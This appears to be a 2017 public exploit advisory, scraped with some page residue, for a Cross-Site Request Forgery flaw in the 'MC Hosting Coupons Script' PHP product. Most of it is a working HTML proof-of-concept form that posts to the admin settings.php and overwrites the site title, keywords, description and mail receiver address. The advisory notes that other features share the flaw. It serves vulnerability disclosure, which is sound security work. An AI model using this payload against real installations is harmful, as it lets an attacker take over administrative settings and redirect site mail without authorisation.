28 lines
No EOL
1.6 KiB
HTML
28 lines
No EOL
1.6 KiB
HTML
# # # # #
|
|
# Vulnerability: Cross-Site Request Forgery
|
|
# Date: 15.01.2017
|
|
# Vendor Homepage: http://microcode.ws/
|
|
# Script Name: MC Hosting Coupons Script
|
|
# Script Buy Now: http://microcode.ws/product/mc-hosting-coupons-php-script/3881
|
|
# Author: İhsan Şencan
|
|
# Author Web: http://ihsan.net
|
|
# Mail : ihsan[beygir]ihsan[nokta]net
|
|
# # # # #
|
|
# Other features have the same security vulnerability.
|
|
# Exploit:
|
|
<html>
|
|
<body>
|
|
<form class="form-horizontal" method="post" action="http://localhost/[PATH]/admin/settings.php" id="settings_form">
|
|
<label for="website_name" class="control-label col-lg-4">Website Name (Title)</label><br>
|
|
<input value="MC Hosting Coupons" class="validate[required] form-control" type="text" name="website_name" id="website_name" placeholder="Write website name(title)..." /><br>
|
|
<label for="website_keywords" class="control-label col-lg-4">Website Keywords</label><br>
|
|
<input value="hosting, coupons, save money" class="form-control" type="text" name="website_keywords" id="website_keywords" placeholder="Write website keywords..." /><br>
|
|
<label for="email_receiver_address" class="control-label col-lg-4">Mail Receiver Email Address</label><br>
|
|
<input value="mail@gmail.com" class="validate[required] form-control" type="text" name="email_receiver_address" id="email_receiver_address" placeholder="Write receiver email address..."><br>
|
|
<label for="website_desc" class="control-label col-lg-4">Website Description</label><br>
|
|
<textarea class="form-control" name="website_desc" id="website_desc" placeholder="Write website desc..." ></textarea><br>
|
|
<input type="submit" name="sub" value="Submit" class="btn btn-primary" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
# # # # # |